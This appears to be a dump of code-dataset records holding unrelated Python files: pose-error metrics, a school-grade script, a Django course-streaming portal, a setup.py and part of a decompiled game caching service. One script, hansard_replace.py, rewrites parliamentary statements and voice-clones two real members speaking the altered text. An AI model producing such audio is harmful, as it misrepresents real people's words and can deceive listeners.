copy.deepcopy(est_pose)\n rot_diff = np.degrees(\n np.array(tf3d.euler.mat2euler(np.matmul(np.linalg.inv(gt_pose[:3, :3]), est_pose_new[:3, :3]), 'szyx')))\n if np.abs(rot_diff[0]) > 90:\n est_pose_new[:3, 0] *= -1\n est_pose_new[:3, 1] *= -1\n rot_diff = np.array(\n tf3d.euler.mat2euler(np.matmul(np.linalg.inv(gt_pose[:3, :3]), est_pose_new[:3, :3]), 'szyx'))\n else:\n rot_diff = np.radians(rot_diff)\n\n # Compute cosine or error\n error_cos = float(0.5 * (np.trace(est_pose_new[:3, :3].dot(np.linalg.inv(gt_pose[:3, :3]))) - 1.0))\n\n # Avoid invalid values due to numerical errors.\n error_cos = min(1.0, max(-1.0, error_cos))\n\n error = math.acos(error_cos)\n\n return error, rot_diff[2], rot_diff[1], rot_diff[0]\n\n\ndef add_error(gt_pose, est_pose, pts):\n gt_pts = copy.deepcopy(pts)\n gt_pts = np.matmul(gt_pts, np.linalg.inv(gt_pose[:3, :3]))\n gt_pts += gt_pose[:3, 3]\n\n est_pts = copy.deepcopy(pts)\n est_pts = np.matmul(est_pts, np.linalg.inv(est_pose[:3, :3]))\n est_pts += est_pose[:3, 3]\n\n error = np.linalg.norm(est_pts - gt_pts, axis=1).mean()\n\n return error\n\n\ndef add_symmetric_error(gt_pose, est_pose, pts):\n error_1 = add_error(gt_pose, est_pose, pts)\n\n est_pose_rot_z = copy.deepcopy(est_pose)\n est_pose_rot_z[:3, 0] *= -1\n est_pose_rot_z[:3, 1] *= -1\n error_2 = add_error(gt_pose, est_pose_rot_z, pts)\n\n return min(error_1, error_2)\n\n\ndef get_all_errors(gt_pose, est_pose, pts, error_dict):\n add = add_error(gt_pose, est_pose, pts)\n add_s = add_symmetric_error(gt_pose, est_pose, pts)\n t = translation_error(gt_pose, est_pose)\n r = rotation_error(gt_pose, est_pose)\n\n result_dict = {}\n for key in error_dict:\n if key == ADD_CODE:\n result_dict[ADD_CODE] = add\n elif key == ADDS_CODE:\n result_dict[ADDS_CODE] = add_s\n elif key == TRANSLATION_CODE:\n result_dict[TRANSLATION_CODE] = t\n elif key == ROTATION_CODE:\n result_dict[ROTATION_CODE] = r[0]\n elif key == ROTATION_X_CODE:\n result_dict[ROTATION_X_CODE] = r[1]\n elif key == ROTATION_Y_CODE:\n result_dict[ROTATION_Y_CODE] = r[2]\n elif key == ROTATION_Z_CODE:\n result_dict[ROTATION_Z_CODE] = r[3]\n\n return result_dict\n\n\ndef get_all_errors_batch(gt_poses, est_poses, pts, error_dict):\n results_dict = {}\n for key in error_dict:\n results_dict[key] = []\n for i in range(len(gt_poses)):\n errors = get_all_errors(gt_poses[i], est_poses[i], pts, error_dict)\n for key in error_dict:\n results_dict[key].append(errors[key])\n return results_dict\n\n\ndef eval_grasps(error_dict, add_th=None, adds_th=None, tr_th=None):\n add_eval = (0., 0)\n adds_eval = (0., 0)\n tr_eval = (0., 0)\n trxyz_eval = (0., 0)\n\n if add_th is not None and ADD_CODE in error_dict.keys():\n add_eval = eval_add_adds(error_dict[ADD_CODE], add_th)\n\n if adds_th is not None and ADDS_CODE in error_dict.keys():\n adds_eval = eval_add_adds(error_dict[ADDS_CODE], adds_th)\n\n if tr_th is not None:\n if TRANSLATION_CODE in error_dict.keys():\n t_e = error_dict[TRANSLATION_CODE]\n r_e = []\n r_e_x = []\n r_e_y = []\n r_e_z = []\n if ROTATION_CODE in error_dict.keys():\n r_e = error_dict[ROTATION_CODE]\n if ROTATION_X_CODE in error_dict.keys() and \\\n ROTATION_Y_CODE in error_dict.keys() and ROTATION_Z_CODE in error_dict.keys():\n r_e_x = error_dict[ROTATION_X_CODE]\n r_e_y = error_dict[ROTATION_Y_CODE]\n r_e_z = error_dict[ROTATION_Z_CODE]\n tr_eval, trxyz_eval = eval_translation_rotation(t_e, r_e, r_e_x, r_e_y, r_e_z, tr_th[0], tr_th[1])\n\n return add_eval, adds_eval, tr_eval, trxyz_eval\n\n\ndef eval_add_adds(errors, threshold):\n num_correct = 0\n for e in errors:\n if e <= threshold:\n num_correct += 1\n return float(num_correct) / float(len(errors)), num_correct\n\n\ndef eval_translation_rotation(t_errors, r_errors, r_x_errors, r_y_errors, r_z_errors, t_threshold, r_threshold):\n if len(r_errors) > 0:\n num_correct = 0\n for i in range(len(t_errors)):\n if t_errors[i] <= t_threshold and r_errors[i] <= r_threshold:\n num_correct += 1\n tr_eval = float(num_correct) / float(len(t_errors)), num_correct\n else:\n tr_eval = 0., 0\n\n if len(r_x_errors) > 0 and len(r_y_errors) > 0 and len(r_z_errors) > 0:\n num_correct = 0\n xx = []\n yy = []\n zz = []\n for i in range(len(t_errors)):\n # y should be symmetric\n xx.append(np.degrees(r_x_errors[i]))\n yy.append(np.degrees(r_y_errors[i]))\n zz.append(np.degrees(r_z_errors[i]))\n if t_errors[i] <= t_threshold and r_x_errors[i] <= r_threshold and r_y_errors[i] <= r_threshold and \\\n r_z_errors[i] <= r_threshold:\n num_correct += 1\n trxyz_eval = float(num_correct) / float(len(t_errors)), num_correct\n else:\n trxyz_eval = 0., 0\n\n return tr_eval, trxyz_eval\n","sub_path":"utils/error_def.py","file_name":"error_def.py","file_ext":"py","file_size_in_byte":6504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"119421171","text":"#string = input('Строка: ')\n\n#for letter in string:\n# print(letter)\n\ndef average(scores):\n return sum(scores) / len(scores)\n\nclasses = [\n {'school_class': '4a', 'scores': [3,4,4,5,2]},\n {'school_class': '7б', 'scores': [5,4,5,5,3,2,2]},\n {'school_class': '10а', 'scores': [5,5,5,5,5]},\n {'school_class': '9в', 'scores': [3,4,4]},\n {'school_class': '6б', 'scores': [3,4,4,5,2]}\n]\n\nall_marks = []\nfor index in classes:\n all_marks.extend(index['scores'])\n avg = average(index['scores'])\n print('Средний балл в ' + index['school_class'] + ' классе: ' + str(avg))\n\nprint('\\nСредний балл в школе: ' + str(average(all_marks)))\n\n#print(classes[0]['school_class'])\n#print(average([2, 3, 4]))","sub_path":"for_task.py","file_name":"for_task.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"624160987","text":"from textHelpers import get_hansard, text_operations\nfrom cloner import VoiceCloner\nimport librosa\nimport numpy as np\n\nimport os\n\nDATE = \"2020-04-22\"\nvc = VoiceCloner()\n\n\ndef chunks(arr, n):\n n = max(1, n)\n return (arr[i:i+n] for i in range(0, len(arr), n))\n\n\nstatements = get_hansard.GetHansard(date=DATE, members=[4007, 4514])\nchanged_statements = text_operations.replace_words(statements)\n\nif not os.path.exists(\"output/\" + DATE):\n os.mkdir(\"output/\" + DATE)\n\nfile_no = 0\nfor statement in changed_statements:\n if os.path.exists(\"reference_audio/%s.wav\" % statement[0]):\n words = statement[1].split(\" \")\n wavs = []\n word_chunks = chunks(words, 25)\n last_chunk = \"\"\n for chunk in word_chunks:\n if len(chunk) < 15:\n chunk = last_chunk + chunk\n wavs.pop()\n chunk_text = \" \".join(chunk)\n new_wav = vc.gen_audio(\"reference_audio/%s.wav\" % statement[0], chunk_text)\n wavs.append(new_wav)\n last_chunk = chunk\n fpath = \"output/%s/output_%02d.wav\" % (DATE, file_no)\n file_no += 1\n generated_wav = np.concatenate(wavs)\n librosa.output.write_wav(fpath, generated_wav.astype(np.float32), vc.synthesizer.sample_rate)\n print(\"\\nSaved output as %s\\n\\n\" % fpath)\n\n\n","sub_path":"hansard_replace.py","file_name":"hansard_replace.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"399137182","text":"# -*- coding: utf-8 -*-\n# @Author: Shuang0420\n# @Date: 2017-12-12 11:47:28\n# @Last Modified by: Shuang0420\n# @Last Modified time: 2017-12-12 11:47:28\n\n'''\nBuild the DeepQA Chinese version package\n'''\n\nfrom setuptools import setup, find_packages\n\nVERSION = \"0.1.0\"\n\nsetup_args = dict( name=\"deepqa\",\n version=VERSION,\n author=\"Shuang0420\",\n author_email=\"sxu1@alumni.cmu.edu\",\n\n description=\"Deep QA\",\n long_description=\"\"\"DeepQA which supports Chinese dataset\"\"\",\n url=\"https://github.com/Shuang0420/Dual-LSTM-Encoder-Rank-Model.git\",\n platforms=[\"any\"],\n classifiers=[\"Development Status :: 1 - Beta\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"Programming Language :: Python\",\n \"Programming Language :: Python :: 3\",\n \"Programming Language :: Python :: 3.4\",\n \"Programming Language :: Python :: 3.5\",\n \"Programming Language :: Python :: 3.6\",\n \"License :: OSI Approved :: BSD License\",\n \"Operating System :: OS Independent\",\n \"Topic :: Communications :: Chat\",\n \"Topic :: Scientific/Engineering :: Artificial Intelligence\"\n ],\n\n install_requires = [ 'setuptools',\n ],\n\n packages = find_packages(),\n\n include_package_data = False, # otherwise package_data is not used\n )\n\nif __name__ == '__main__':\n setup( **setup_args )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1886,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"330056061","text":"\n\n#calss header\nclass _MOCKING():\n\tdef __init__(self,): \n\t\tself.name = \"MOCKING\"\n\t\tself.definitions = [u'mocking behaviour involves laughing at someone or something in an unkind way: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'adjectives'\n\n\n\tdef run(self, obj1, obj2):\n\t\tself.jsondata[obj2] = {}\n\t\tself.jsondata[obj2]['properties'] = self.name.lower()\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/adjectives/_mocking.py","file_name":"_mocking.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"505717533","text":"from django.contrib.auth import authenticate, login, logout\nfrom django.core.urlresolvers import reverse\nfrom django.http import Http404\nfrom django.http.response import HttpResponse\nfrom django.db.models import Q\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.utils.crypto import get_random_string\nfrom forms import *\n\ndef home(request):\n context = {}\n if request.user.is_authenticated():\n if hasattr(request.user, 'admin_school'):\n context['school'] = request.user.admin_school.name\n context['professors'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=True)\n context['professors_awaiting_approval'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=False)\n context['recommendations'] = (CourseRecommendation.objects\n .filter(school=request.user.admin_school)\n .order_by('-num_recommendations'))\n return render(request, 'portal/school_admin_index.html', context)\n elif hasattr(request.user, 'professor'):\n context['school'] = request.user.professor.school.name\n context['courses'] = Course.objects.filter(\n professor=request.user.professor)\n return render(request, 'portal/professor_index.html', context)\n elif hasattr(request.user, 'student'):\n context['school'] = request.user.student.school.name\n streams = Stream.objects.filter(\n is_active=True, course__school=request.user.student.school)\n streams = streams.filter(\n Q(course__roster__in=[request.user.student])\n | Q(course__roster=None))\n subscription_streams = Stream.objects.filter(\n is_active=True, course__school=request.user.student.school,\n course__in=request.user.student.subscriptions.all())\n context['streams'] = streams\n context['subscription_streams'] = subscription_streams\n return render(request, 'portal/index.html', context)\n else:\n context['signup_form'] = SignupForm()\n context['login_form'] = LoginForm()\n return render(request, 'portal/landing_page.html', context)\n\ndef about(request):\n context = {}\n return render(request, 'portal/about.html', context)\n\ndef contact(request):\n context = {}\n return render(request, 'portal/contact.html', context)\n \ndef signup(request):\n if request.method == 'POST':\n context = {}\n form = SignupForm(request.POST)\n if not form.is_valid():\n context['signup_form'] = form\n context['login_form'] = LoginForm()\n return render(request, 'portal/landing_page.html', context)\n cd = form.cleaned_data\n user = form.save()\n school = School.objects.get(email_handle=cd['username'].split('@')[1])\n if cd['is_professor']:\n professor = Professor(user=user, school=school, is_active=False)\n professor.save()\n context['signup_form'] = SignupForm()\n context['login_form'] = LoginForm()\n context['professor_signed_up'] = True\n return render(request, 'portal/landing_page.html', context)\n else:\n student = Student(user=user, school=school)\n student.save()\n login_user = authenticate(username=cd['username'],\n password=cd['password1'])\n login(request, login_user)\n return redirect(reverse('home'))\n else:\n raise Http404\n\ndef login_path(request):\n if request.method == 'POST':\n context = {}\n form = LoginForm(request.POST)\n if not form.is_valid():\n context['signup_form'] = SignupForm()\n context['login_form'] = form\n return render(request, 'portal/landing_page.html', context) \n user = authenticate(username=form.cleaned_data['email'],\n password=form.cleaned_data['password'])\n if user is None:\n context['no_user_found'] = True\n context['signup_form'] = SignupForm()\n context['login_form'] = form\n return render(request, 'portal/landing_page.html', context)\n elif hasattr(user, 'professor') and not user.professor.is_active:\n context['professor_inactive'] = True\n context['signup_form'] = SignupForm()\n context['login_form'] = form\n return render(request, 'portal/landing_page.html', context)\n else:\n login(request, user)\n return redirect(reverse('home'))\n else:\n raise Http404\n\ndef logout_path(request):\n logout(request)\n return redirect(reverse('home'))\n\ndef stream(request):\n if request.user.is_authenticated():\n context = {}\n context['courses'] = request.user.student.ta_courses.all()\n return render(request, 'portal/stream.html', context)\n else:\n raise Http404\n\ndef stream_course(request, course_id):\n if request.user.is_authenticated():\n context = {}\n course = get_object_or_404(Course, pk=course_id)\n student = request.user.student\n if course not in student.ta_courses.all():\n raise Http404\n if (Stream.objects.filter(\n is_active=True, course=course, streamer=student).first()):\n raise Http404\n key = get_random_string(length=32)\n while Stream.objects.filter(stream_key=key).first() is not None:\n key = get_random_string(length=32)\n stream = Stream(\n course=course, streamer=student, is_active=True,\n stream_key=key)\n stream.save()\n context['stream'] = stream\n return render(request, 'portal/stream_course.html', context)\n else:\n raise Http404\n\ndef view_stream(request, stream_id):\n if request.user.is_authenticated():\n context = {}\n stream = get_object_or_404(Stream, pk=stream_id)\n if stream.course.school != request.user.student.school:\n raise Http404\n if not stream.is_active:\n return redirect(reverse('home'))\n context['stream'] = stream\n return render(request, 'portal/view_course.html', context)\n else:\n raise Http404\n\ndef end_stream(request, stream_id):\n if request.user.is_authenticated():\n context = {}\n stream = get_object_or_404(Stream, pk=stream_id)\n if stream.streamer != request.user.student:\n raise Http404\n stream.is_active = False\n stream.save()\n return HttpResponse('')\n else:\n raise Http404\n\ndef activate_professor(request, professor_id):\n professor = get_object_or_404(Professor, pk=professor_id)\n if (request.user.is_authenticated()\n and professor.school == request.user.admin_school):\n context = {}\n professor.is_active = True\n professor.save()\n context['notification'] = (\n \"Professor account for %s has been activated.\" \n % professor.user.username)\n context['professors'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=True)\n context['professors_awaiting_approval'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=False)\n return render(request, 'portal/school_admin_index.html', context)\n else:\n raise Http404\n\ndef delete_professor(request, professor_id):\n professor = get_object_or_404(Professor, pk=professor_id)\n if (request.user.is_authenticated()\n and professor.school == request.user.admin_school):\n context = {}\n context['notification'] = (\n \"Professor account for %s has been activated.\" \n % professor.user.username)\n professor.delete()\n context['professors'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=True)\n context['professors_awaiting_approval'] = Professor.objects.filter(\n school=request.user.admin_school, is_active=False)\n return render(request, 'portal/school_admin_index.html', context)\n else:\n raise Http404\n\ndef add_course(request):\n context = {}\n if (request.user.is_authenticated() and hasattr(request.user, 'professor')):\n if request.method == 'GET':\n form = CourseForm()\n form.fields['tas'].queryset = (\n Student.objects.filter(school=request.user.professor.school)) \n form.fields['roster'].queryset = (\n Student.objects.filter(school=request.user.professor.school)) \n context['form'] = form\n return render(request, 'portal/add_course.html', context)\n elif request.method == 'POST':\n form = CourseForm(request.POST)\n form.fields['tas'].queryset = (\n Student.objects.filter(school=request.user.professor.school)) \n form.fields['roster'].queryset = (\n Student.objects.filter(school=request.user.professor.school)) \n if not form.is_valid():\n context['form'] = form\n return render(request, 'portal/add_course.html', context)\n cd = form.cleaned_data\n course = form.save(commit=False)\n course.professor = request.user.professor\n course.school = request.user.professor.school\n course.save()\n for ta in cd['tas']:\n course.tas.add(ta)\n for student in cd['roster']:\n course.roster.add(student)\n course.save()\n return redirect(reverse('home'))\n else:\n raise Http404\n else:\n raise Http404\n\ndef edit_course(request, course_id):\n context = {}\n course = get_object_or_404(Course, pk=course_id)\n context['course'] = course\n if (request.user.is_authenticated() and hasattr(request.user, 'professor')\n and course.professor == request.user.professor):\n if request.method == 'GET':\n form = CourseForm(instance=course)\n form.fields['tas'].queryset = (\n Student.objects.filter(school=request.user.professor.school))\n form.fields['tas'].initial = course.tas.all() \n form.fields['roster'].queryset = (\n Student.objects.filter(school=request.user.professor.school))\n form.fields['roster'].initial = course.roster.all() \n context['form'] = form\n return render(request, 'portal/edit_course.html', context)\n elif request.method == 'POST':\n form = CourseForm(request.POST, instance=course)\n form.fields['tas'].queryset = (\n Student.objects.filter(school=request.user.professor.school)) \n form.fields['roster'].queryset = (\n Student.objects.filter(school=request.user.professor.school))\n if not form.is_valid():\n context['form'] = form\n return render(request, 'portal/edit_course.html', context)\n cd = form.cleaned_data\n course = form.save()\n course.tas.clear()\n course.roster.clear()\n for ta in cd['tas']:\n course.tas.add(ta)\n for student in cd['roster']:\n course.roster.add(student)\n course.save()\n form.fields['tas'].initial = course.tas.all() \n form.fields['roster'].initial = course.roster.all() \n context['course_saved'] = True\n context['form'] = form\n return render(request, 'portal/edit_course.html', context)\n else:\n raise Http404\n else:\n raise Http404\n\ndef courses(request):\n context = {}\n if (request.user.is_authenticated() and hasattr(request.user, 'student')):\n courses = Course.objects.filter(school=request.user.student.school)\n courses = courses.filter(\n Q(roster__in=[request.user.student])\n | Q(roster=None))\n course_list = []\n for course in courses:\n if course in request.user.student.subscriptions.all():\n course_list.append((course, True))\n else:\n course_list.append((course, False))\n context['courses'] = course_list\n context['school'] = request.user.student.school.name\n return render(request, 'portal/courses.html', context)\n else:\n raise Http404\n\ndef subscription(request, course_id):\n context = {}\n course = get_object_or_404(Course, pk=course_id)\n context['course'] = course\n if (request.user.is_authenticated() and hasattr(request.user, 'student')\n and course.school == request.user.student.school):\n if course in request.user.student.subscriptions.all():\n request.user.student.subscriptions.remove(course)\n else:\n request.user.student.subscriptions.add(course)\n return redirect(reverse('courses'))\n else:\n raise Http404\n\ndef recommend(request):\n context = {}\n if (request.user.is_authenticated() and hasattr(request.user, 'student')):\n if request.method == 'GET':\n context['form'] = CourseRecommendationForm()\n return render(request, 'portal/recommend.html', context)\n elif request.method == 'POST':\n form = CourseRecommendationForm(request.POST)\n if not form.is_valid():\n context['form'] = form\n return render(request, 'portal/recommend.html', context)\n else:\n course_num = form.cleaned_data['course_num']\n if (CourseRecommendation.objects\n .filter(course_number=course_num,\n school=request.user.student.school)\n .exists()):\n rec = CourseRecommendation.objects.get(\n course_number=course_num,\n school=request.user.student.school)\n rec.num_recommendations = rec.num_recommendations + 1\n rec.save()\n else:\n rec = CourseRecommendation.objects.create(\n course_number=course_num,\n num_recommendations=1,\n school=request.user.student.school)\n context['notification'] = \"Thank you for your recommendation.\"\n context['form'] = CourseRecommendationForm\n return render(request, 'portal/recommend.html', context)\n else:\n raise Http404\n else:\n raise Http404\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"portal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":14782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"319270193","text":"# Python bytecode 2.7 (decompiled from Python 2.7)\n# Embedded file name: e:\\jenkins\\workspace\\client_SERENITY\\branches\\release\\SERENITY\\carbon\\common\\script\\net\\objectCaching.py\nimport blue\nimport telemetry\nimport uthread\nimport types\nimport util\nimport zlib\nimport carbon.common.script.net.machobase as macho\nfrom carbon.common.script.net.machoNetAddress import MachoAddress\nfrom carbon.common.script.net.cachedObject import CachedObject as utilCachedObject\nimport random\nimport sys\nimport service\nimport base\nimport binascii\nimport os\nimport const\nimport cPickle\nimport log\nglobals().update(service.consts)\nfrom timerstuff import ClockThis\ncacheSessionVariables = None\n\nclass CoreObjectCachingSvc(service.Service):\n __guid__ = 'svc.objectCaching'\n __displayname__ = 'Object Caching Service'\n __dependencies__ = ['machoNet']\n __exportedcalls__ = {'GetCachableObject': [ROLE_ANY],'GetCachedObject': [ROLE_ANY],'GetCachedObjectVersion': [ROLE_ANY],'InvalidateCachedObjects': [\n ROLE_SERVICE],\n 'InvalidateCachedMethodCall': [ROLE_SERVICE],'CacheObject': [ROLE_SERVICE],'RefreshCache': [ROLE_SERVICE],'GetCachedMethodCallVersion': [ROLE_SERVICE]}\n __counters__ = {'cachedBytes': 'normal'}\n __versionchecktimes__ = {'year': const.YEAR360,'6 months': const.MONTH30 * 6,'3 months': const.MONTH30 * 3,'month': const.MONTH30,'week': const.DAY * 7,'day': const.DAY,'12 hours': const.HOUR * 12,'6 hours': const.HOUR * 6,\n '3 hours': const.HOUR * 3,'2 hours': const.HOUR * 2,'1 hour': const.HOUR * 1,'30 minutes': const.MIN * 30,\n '15 minutes': const.MIN * 15,'5 minutes': const.MIN * 5,'1 minute': const.MIN,'30 seconds': const.SEC * 30,'15 seconds': const.SEC * 15,'5 seconds': const.SEC * 5,'1 second': const.SEC}\n __cachedsessionvariables__ = ['languageID']\n\n def __init__(self):\n if macho.mode == 'server':\n self.__dependencies__.append('DB2')\n service.Service.__init__(self)\n self.runid = blue.os.GetWallclockTime()\n self.lastChange = {}\n self.cachedObjects = {}\n self.cachedMethodCalls = {}\n self.methodCallCachingDetails = {}\n self.cachedObjectReturnStatistics = {}\n self.lastFileWriteTime = {}\n self.downloadedCachedObjects = {}\n\n def GetHtmlStateDetails(self, k, v, detailed):\n import htmlwriter\n if k == 'cachedObjects':\n if detailed:\n hd = ['ObjectID', 'Time Stamp',\n 'Version', 'Shared', 'NodeID', 'Size']\n li = []\n for ik, iv in v.iteritems():\n l = '???'\n if iv.pickle:\n l = '%d' % len(iv.pickle)\n if iv.compressed:\n l += ' (compressed)'\n li.append([iv.objectID, util.FmtDateEng(iv.version[0]), iv.version[1], iv.shared, iv.nodeID, l])\n\n return ('Object Cache', htmlwriter.GetTable(hd, li, useFilter=True))\n else:\n return ('Object Cache', '%d entries' % len(v))\n elif k == 'cachedObjectReturnStatistics':\n if detailed:\n hd = ['ObjectID', 'Count', 'Bytes']\n li = []\n for ik, iv in v.iteritems():\n if type(ik) == types.TupleType and len(ik) == 2 and ik[0] in sm.services:\n ik = '%s::%s' % ik\n li.append([htmlwriter.Swing(str(ik)), iv[0], iv[1]])\n\n li.sort()\n return ('Object Cache Statistics', htmlwriter.GetTable(hd, li, useFilter=True))\n else:\n totCalls = 0\n totBytes = 0\n for each in v.itervalues():\n totCalls += each[0]\n totBytes += each[1]\n\n return ('Object Cache Statistics', '%d distinct objects returned via %d calls, totalling %d bytes' % (len(v), totCalls, totBytes))\n\n def Run(self, memStream=None):\n service.Service.Run(self, memStream)\n self.methodCallCachingDetails = {}\n self.cachedMethodCalls = {}\n self.cachedObjects = {}\n\n @telemetry.ZONE_METHOD\n def LoadCache(self, ipaddress):\n ipaddress = ipaddress.lower().split(':')[0]\n self.cachePath = blue.paths.ResolvePathForWriting(u'cache:/MachoNet/%s/%d/' % (ipaddress, macho.version))\n paths = [blue.paths.ResolvePath(u'cache:/'), blue.paths.ResolvePathForWriting(u'cache:/MachoNet/'), blue.paths.ResolvePathForWriting(u'cache:/MachoNet/%s' % ipaddress), self.cachePath, self.cachePath + 'CachedMethodCalls', self.cachePath + 'MethodCallCachingDetails',\n self.cachePath + 'CachedObjects']\n self.methodCallCachingDetails = {}\n self.cachedMethodCalls = {}\n self.cachedObjects = {}\n for path in paths:\n try:\n os.listdir(path)\n except OSError:\n os.mkdir(path)\n sys.exc_clear()\n\n def RefreshCache(self):\n self.cachedMethodCalls = {}\n\n def __CacheIsDirty(self, what, key):\n if macho.mode == 'client':\n ret = blue.os.GetWallclockTime()\n shouldFlush = len(self.lastChange) == 0\n self.lastChange[what, key] = ret\n filename = self.cachePath + what + '/%s.cache' % self.KeyToFileName(key)\n self.downloadedCachedObjects[key] = filename\n if shouldFlush:\n uthread.worker('objectCaching::FlushCache', self.__FlushCache, True)\n return ret\n\n def __FlushCache(self, yieldFirst):\n if yieldFirst:\n blue.pyos.synchro.Yield()\n while self.lastChange:\n flushWhat, lastChange = self.lastChange.items()[0]\n del self.lastChange[flushWhat]\n what, key = flushWhat\n filename = self.cachePath + what + '/%s.cache' % self.KeyToFileName(key)\n if os.access(filename, os.F_OK) and not os.access(filename, os.W_OK):\n try:\n os.chmod(filename, 666)\n except StandardError:\n self.LogWarn('Failed to reset access priviledges on file from file system (', filename, ')')\n sys.exc_clear()\n\n try:\n store = getattr(self, what)\n if key not in store:\n try:\n os.unlink(filename)\n self.LogInfo('Deleted ', key, ' from file system (', filename, ')')\n except StandardError as e:\n self.LogWarn('Failed to delete file from file system (', filename, '):', e)\n sys.exc_clear()\n\n else:\n ob = store[key]\n if not isinstance(ob, uthread.Semaphore):\n blue.AtomicFileWrite(filename, blue.marshal.Save((key, ob)))\n self.LogInfo('Wrote ', key, ' to file (', filename, ')')\n self.lastFileWriteTime[self.__KeyFromFileName(filename)] = os.path.getmtime(filename)\n except Exception:\n log.LogException('Error while writing cached data')\n sys.exc_clear()\n\n def KeyToFileName(self, key):\n pickle = cPickle.dumps(key)\n checksum = binascii.crc_hqx(pickle, 0)\n return '%x' % checksum\n\n def __KeyFromFileName(self, fileName):\n fileName = fileName.replace('\\\\', '/')\n i = fileName.rindex('/')\n if i >= 0:\n fileName = fileName[i:]\n i = fileName.rindex('.')\n if i >= 0:\n fileName = fileName[0:i]\n fileName = fileName.lower()\n return fileName\n\n def InvalidateCachedMethodCall(self, serviceOrObjectName, method, *args):\n return self.InvalidateCachedMethodCalls([\n (serviceOrObjectName, method,\n args)])\n\n def InvalidateCachedMethodCalls(self, methodcalls):\n invalidate = []\n for serviceOrObjectName, method, args in methodcalls:\n si = []\n details = self.__GetMethodCallCachingDetails(None, serviceOrObjectName, method)\n if details is not None:\n if 'sessionInfo' in details:\n si = [getattr(session, details['sessionInfo'], None)]\n k = tuple([serviceOrObjectName, method] + si + list(args))\n invalidate.append(k)\n\n self.InvalidateCachedObjects(invalidate)\n return\n\n def __ListPartialMatch(self, l, o, pm):\n if len(pm) == len(l) and len(l) == len(o):\n for i in range(len(l)):\n if pm[i]:\n if i < 2:\n if type(o[i]) in (types.TupleType, types.ListType):\n if l[i] not in o[i]:\n return 0\n if not l[i] == o[i]:\n return 0\n\n return 1\n return 0\n\n def InvalidateCachedObjects(self, objectIDs, forward=1):\n deleted = 0\n for each in objectIDs:\n if each in self.cachedMethodCalls:\n del self.cachedMethodCalls[each]\n self.__CacheIsDirty('cachedMethodCalls', each)\n if type(each) in (\n types.TupleType, types.ListType):\n objectID = each[0]\n version = each[1]\n else:\n objectID = each\n version = None\n if objectID in self.cachedObjects and not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n if version is None or self.__OlderVersion(self.cachedObjects[objectID].version, version):\n del self.cachedObjects[objectID]\n self.__CacheIsDirty('cachedObjects', objectID)\n\n gpcs = sm.services['machoNet']\n gpcs.GetGPCS()\n if macho.mode == 'client':\n return\n else:\n if macho.mode == 'proxy':\n for eachNodeID in sm.services['machoNet'].GetConnectedSolNodes():\n gpcs.RemoteServiceNotify(self.session, MachoAddress(nodeID=eachNodeID, service='objectCaching'), 'objectCaching', 'InvalidateCachedObjects', objectIDs, 0)\n\n elif forward and sm.services['machoNet'].GetConnectedProxyNodes():\n eachNodeID = random.choice(sm.services['machoNet'].GetConnectedProxyNodes())\n gpcs.RemoteServiceNotify(self.session, MachoAddress(nodeID=eachNodeID, service='objectCaching'), 'objectCaching', 'InvalidateCachedObjects', objectIDs, 0)\n return\n\n def GetCachedObject(self, objectID):\n if objectID in self.cachedObjects and not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n return self.cachedObjects[objectID].object\n else:\n return None\n\n def GetCachedObjectVersion(self, objectID):\n if objectID in self.cachedObjects and not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n v = self.cachedObjects[objectID].version\n if v[0] is None:\n return v[1]\n else:\n return v\n return\n\n def GetCachableObject(self, shared, objectID, objectVersion, nodeID):\n callTimer = base.CallTimer('objectCaching::GetCachableObject')\n try:\n if macho.mode == 'client':\n gpcs = sm.services['machoNet']\n else:\n gpcs = sm.services['machoNet']\n gpcs.GetGPCS()\n if objectID in self.cachedObjects and isinstance(self.cachedObjects[objectID], utilCachedObject) and macho.mode == 'proxy':\n if sm.services['machoNet'].GetTransportOfNode(self.cachedObjects[objectID].__nodeID__) is None:\n del self.cachedObjects[objectID]\n if objectID in self.cachedObjects and isinstance(self.cachedObjects[objectID], uthread.Semaphore) or objectID not in self.cachedObjects or not isinstance(self.cachedObjects[objectID], uthread.Semaphore) and self.__OlderVersion(self.cachedObjects[objectID].version, objectVersion):\n if objectID not in self.cachedObjects or not isinstance(self.cachedObjects[objectID], uthread.Semaphore) and self.__OlderVersion(self.cachedObjects[objectID].version, objectVersion):\n self.cachedObjects[objectID] = uthread.Semaphore(('objectCaching', objectID))\n while 1:\n semaphore = self.cachedObjects[objectID]\n semaphore.acquire()\n try:\n if not isinstance(self.cachedObjects[objectID], uthread.Semaphore):\n self.__UpdateStatisticsGetCachableObject(objectID, objectVersion, self.cachedObjects[objectID])\n return self.cachedObjects[objectID]\n if macho.mode == 'client':\n if shared:\n if not sm.services['machoNet'].myProxyNodeID:\n proxyNodeID = nodeID\n else:\n proxyNodeID = sm.services['machoNet'].myProxyNodeID\n remoteObject = gpcs.RemoteServiceCall(session, proxyNodeID, 'objectCaching', 'GetCachableObject', shared, 